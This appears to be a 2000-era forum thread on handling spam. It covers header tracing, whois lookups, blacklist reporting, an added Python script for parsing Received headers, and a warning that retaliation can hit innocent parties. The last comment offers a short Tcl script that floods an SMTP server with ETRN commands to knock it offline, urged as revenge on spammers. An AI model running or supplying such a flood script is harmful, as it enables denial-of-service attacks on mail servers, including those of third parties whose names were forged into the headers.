When Does Spam Equal "Denial of Service"?
"Here is a sample header (with my email adress DELETED):
From - Sat Jul 1 10:11:08 2000
Return-Path:(DELETED)
Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com
(InterMail vM.4.01.03.00 201-229-121) with ESMTP id
for (DELETED)
Sat, 1 Jul 2000 06:46:51 -0700
Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29])
by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694
for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
Received: from mx04.netaddress.usa.net
(mx04.netaddress.usa.net [204.68.24.141])
by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861
for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01)
with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
Received: (apparently) from localhost ([216.8.12.174])
by gsnonweb.com with Microsoft SMTPSVC(5.5.1877.197.19);
Sat, 1 Jul 2000 10:29:50 +0300
X-Mailer: Microsoft Outlook Express 5.00.2014.211
Date: Sat, 01 Jul 2000 00:30:14 -0800
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: 7BIT
From: auto65686@hushmail.com
Message-Id:
Subject: You are invited to join our private club!
To: buddapest@LoadMail.com
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: "
Try this... (Score:3)
Try joining the MAPS Realtime Blacklist [mail-abuse.org] of spammers.
Report the sites listed in the headers to ORBS [orbs.org]. If they have open mail relays, ORBS will log them in its database and send a notification to the postmaster. Mail relays which support ORBS will not relay mail coming from unsecured hosts. If the sites are clean, no harm done, ORBS will not flag them.
Finally, you can always work up a procmail script to filter out most spam. Sure, it doesn't keep spammers from using your network resources, but if everyone did it, spamming would be a lot less profitable.
Hope this helps
Only one question.... (Score:1)
5 days?
If it's more than 6 folks.. you might as well
start armoring your system from this kinda stuff.
Some people are screaming targets on the web.
You just got zapped.
File Suit (Score:1)
Re:File Suit (Score:1)
Please don't just fire mail off to every domain! (Score:2)
Sites like http://www.spamcop.com/, or http://www.spamwatcher.com/ (which I'm in the process of setting up now--don't expect much) will help you track the sender, and who to report the problem to. You want to complain to the ISP where the spam originated. You want to complain to the hosting provider of any URLs mentioned. You want to send a warning note to the relay, telling them that their mailer is misconfigured. The rest of the addresses should be ignored.
These headers are nearly always forged:
To: buddapest@LoadMail.com
From: auto65686@hushmail.com
Message-ID:
The key is to look at the Received headers. They track the message as it goes from one machine to the next. Most, but not all, mail servers record the IP address of the sending machine, and there is no way to forge that. So the goal is to find the first real machine to receive the email, and see where it got the mail from. That machine will typically either be one of yours, or it will be some (idiot) machine which left its mail software open for others to use as a relay. In the latter case, it's worth notifying that company, as well as the originating ISP.
Here are the Received headers in order:
Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com (InterMail vM.4.01.03.00 201-229-121) with ESMTP id for (DELETED) Sat, 1 Jul 2000 06:46:51 -0700
Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29]) by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694 for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
Received: from mx04.netaddress.usa.net (mx04.netaddress.usa.net [204.68.24.141]) by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861 for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
Couldn't parse (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000.
Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01) with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
Received: (apparently) from localhost ([216.8.12.174]) by gsnonweb.com with Microsoft SMTPSVC(5.5.1877.197.19); Sat, 1 Jul 2000 10:29:50 +0300
If we ignore the forgeable names, that makes a chain, and for each element in the chain we can look it up and make sure that the chain makes sense.
From: 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net)
To: gsnonweb.com (194.90.1.6)
From: 194.90.101.35 (gsnews.gsnonweb.com)
To: mx04 via mtad (34FM1.5.01) (Unknown)
From: 204.68.24.141 (mx04.netaddress.usa.net)
To: mx11-rwc.mail.home.com (24.0.95.29)
From: 24.0.95.29 (mx11-rwc.mail.home.com)
To: h11.mail.home.com (24.0.95.45)
From: 24.0.95.45 (h11.mail.home.com)
To: mail.rdc2.pa.home.com (24.12.106.196)
So the spammer probably sent from 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net).
And gsnonweb.com (194.90.1.6) is probably a system with an open relay.
Here is information on the ISP that owns the domains in question.
Spammer: 216.8.12.174 (la-ip-1-174.dynamic.ziplink.net)
Ziplink Inc. (NETBLK-NET-ZIPLINK2)
900 Chelmsford St., Tower 1, 5th Floor
Lowell, MA 01851
US
Netname: NET-ZIPLINK2
Netblock: 216.8.0.0 - 216.8.63.255
Maintainer: ZIPL
Coordinator:
Clampitt, Dustin (DC35-ARIN) dclampitt@ZIPLINK.NET
978 551 8602 (FAX) 978 970 0358
Domain System inverse mapping provided by:
PICNIC.ZIPLINK.NET 206.15.168.65
TITANIC.ZIPLINK.NET 206.15.168.70
Record last updated on 16-Nov-1999.
Database last updated on 14-Jul-2000 18:30:27 EDT.
The ARIN Registration Services Host contains ONLY Internet
Network Information: Networks, ASN's, and related POC's.
Please use the whois server at rs.internic.net for DOMAIN related
Information and whois.nic.mil for NIPRNET Information.
Relay: gsnonweb.com (194.90.1.6)
inetnum: 194.90.0.0 - 194.90.6.255
netname: NVNET1
descr: NetVision Ltd.
descr: ISP
descr: Local Networks
country: IL
admin-c: NN105-RIPE
tech-c: NN105-RIPE
status: ASSIGNED PA
mnt-by: NV-MNT-RIPE
mnt-lower: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990413
source: RIPE
route: 194.90.0.0/16
descr: Netvision
descr: Omega Bldg.
descr: MATAM industrial park
descr: Haifa 31905
descr: Israel
origin: AS1680
advisory: AS690 1:1239 2:3561 3:6453
mnt-by: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990902
source: RIPE
role: Netvision NOC team
address: Omega Building
address: MATAM industrial park
address: Haifa 31905
address: Israel
phone: +972 48 560 600
fax-no: +972 48 551 132
e-mail: noc-team@netvision.net.il
trouble: Send abuse and spam reports to abuse@netvision.net.il
admin-c: YG-RIPE
admin-c: YS-RIPE
admin-c: NNT-RIPE
tech-c: YG-RIPE
tech-c: YS-RIPE
tech-c: NNT-RIPE
tech-c: WAN-RIPE
nic-hdl: NN105-RIPE
notify: noc-team@netvision.net.il
notify: hm-dbm-msgs@ripe.net
mnt-by: NV-MNT-RIPE
changed: noc-team@netvision.net.il 19990505
changed: noc-team@netvision.net.il 20000315
changed: noc-team@netvision.net.il 20000525
changed: noc-team@netvision.net.il 20000531
source: RIPE
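The bottom-up walk through the Received chain that the post above describes, written out as an added Python example (not the poster's code, nor spamcop's or spamwatcher's): it unfolds the headers, trusts only the bracketed IP that each receiving MTA logged (the "from X" name is just the sender's claim), skips the qmail local stamp that the poster's tool couldn't parse, and checks that each hop's receiver is the host the next hop says it got the mail from. The sample headers are the ones quoted in the post, joined onto single lines except the first.

```python
import re

# Constructed sample: the Received: headers quoted in the post above, with the
# first one left folded across three lines so unfold() has work to do.
RAW_HEADERS = """\
Received: from h11.mail.home.com ([24.0.95.45]) by mail.rdc2.pa.home.com
 (InterMail vM.4.01.03.00 201-229-121) with ESMTP id for (DELETED)
 Sat, 1 Jul 2000 06:46:51 -0700
Received: from mx11-rwc.mail.home.com (mx11-rwc.mail.home.com [24.0.95.29]) by h11.mail.home.com (8.9.3/8.9.0) with ESMTP id GAA25694 for (DELETED); Sat, 1 Jul 2000 06:46:51 -0700 (PDT)
Received: from mx04.netaddress.usa.net (mx04.netaddress.usa.net [204.68.24.141]) by mx11-rwc.mail.home.com (8.9.1/8.9.1) with SMTP id GAA20861 for (DELETED); Sat, 1 Jul 2000 06:46:50 -0700 (PDT)
Received: (qmail 4654 invoked by uid 0); 1 Jul 2000 13:46:00 -0000
Received: from gsnonweb.com [194.90.101.35] by mx04 via mtad (34FM1.5.01) with ESMTP id 143egaNtx0454M04; Sat, 01 Jul 2000 13:45:58 GMT
Received: (apparently) from localhost ([216.8.12.174]) by gsnonweb.com with Microsoft SMTPSVC(5.5.1877.197.19); Sat, 1 Jul 2000 10:29:50 +0300
From: auto65686@hushmail.com
"""
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HOP_RE = re.compile(r"(?:\(apparently\)\s*)?from\s+(\S+)\s*(.*?)\s+by\s+(\S+)")

def unfold(raw):
    """Join RFC 822 continuation lines (leading whitespace) onto their header."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line)
    return lines

def parse_received(value):
    """(claimed_name, logged_ip, receiver), or None when the line records no
    network hop, e.g. qmail's local '(qmail N invoked by uid 0)' stamp."""
    m = HOP_RE.match(value)
    if not m:
        return None
    claimed, middle, receiver = m.groups()
    ip = IP_RE.search(middle)  # the IP the receiving MTA saw; only this is trusted
    return claimed.lower(), ip.group(1) if ip else None, receiver.lower()

def trace_chain(raw):
    """Hops earliest-first: MTAs prepend Received:, so the bottom one is the origin."""
    values = [l.split(":", 1)[1].strip() for l in unfold(raw) if l.lower().startswith("received:")]
    hops = filter(None, (parse_received(v) for v in reversed(values)))
    return [{"claimed": c, "ip": i, "receiver": r} for c, i, r in hops]

def breaks(hops):
    """Indices where hop i's receiver is not the host hop i+1 says it got the mail
    from (a short name like 'mx04' matches as a prefix); that is where forged
    lines were most likely inserted. Empty means the chain is consistent."""
    return [i for i in range(len(hops) - 1) if not hops[i + 1]["claimed"].startswith(hops[i]["receiver"])]
```

`trace_chain(RAW_HEADERS)[0]["ip"]` is the address to look up in whois and report, which for this sample is 216.8.12.174, the same origin the post arrives at by hand.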
Couldn't you just.... (Score:1)
Rich
BAD idea (Score:1)
Company A spams you, but forges the headers and makes it look like Company C is spamming you.
You (failing to realize that Company A is the real culprit) retaliate against Company C.
Guess who is liable for the damages to Company C? (hint: you are)
Even more fun is if their system has an auto-responder. You bounce to them, they bounce to you, bounce to them, bounce to you, bounce to them and so on.
DOS them (Score:1)
It took Anticlan.com's ftp server down. Ya, it hits HARD. Hangs the mail server sending it. Works on sendmail, and most others. This is for anyone having trouble with spammers. Save this in a file and do 'tcl file', or 'tclsh file'.
--------------------CUT HERE------------------
set flood_count 2000
set curr_count 30
proc do_port { host port } {
puts stdout "Flooding $host:$port
if {![catch {socket $host $port} sockfd]} {
puts stdout "CONNECTED.. "
puts stdout "SENDING SHIT.. "
puts $sockfd "ETRN x"
puts stdout "DONE!"
} else {
puts stdout "FAILED."
}
}
while {$curr_count < $flood_count} {
set curr_count [expr $curr_count + 1]
do_port server 25
}
----------------UNCUT HERE------------------